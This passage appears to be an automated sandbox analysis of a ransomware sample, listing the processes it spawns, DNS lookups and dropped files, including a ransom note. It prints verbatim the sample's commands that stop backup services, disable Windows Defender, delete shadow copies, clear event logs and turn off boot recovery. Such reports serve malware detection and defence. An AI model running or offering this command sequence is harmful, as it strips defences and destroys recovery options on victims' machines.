PID 4768 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe
PID 4768 wrote to memory of 544 N/A C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe C:\Windows\SYSTEM32\reg.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\c5ea00ea5973347d54d66f12fb5ee242_JaffaCakes118.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_28111" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_28111" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_28111" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/2056-2-0x00000200D7230000-0x00000200D7252000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ubdxtedy.nfr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 59d97011e091004eaffb9816aa0b9abd
SHA1 1602a56b01dd4b7c577ca27d3117e4bcc1aa657b
SHA256 18f381e0db020a763b8c515c346ef58679ab9c403267eacfef5359e272f7e71d
SHA512 d9ca49c1a17580981e2c1a50d73c0eecaa7a62f8514741512172e395af2a3d80aeb0f71c58bc7f52c18246d57ba67af09b6bff4776877d6cc6f0245c30e092d6

C:\Program Files\phLK_HOW_TO_DECRYPT.txt

MD5 7c7498625660600d7277d186038c05fa
SHA1 144ea5eccf0824e9c30681f64c25224753886533
SHA256 1da21b2c48b5e60b2e6ced94b990c73a0644fc147cc13b38c022a9f1c058ad3c
SHA512 32ee4b3ba5a1c86ee47be70428204af3f30f865eba33693a235dd7c6ae51d33369b4a486ee41e837c8fbe117edf54ba0cd01b1535a369c14683ca833768d4e92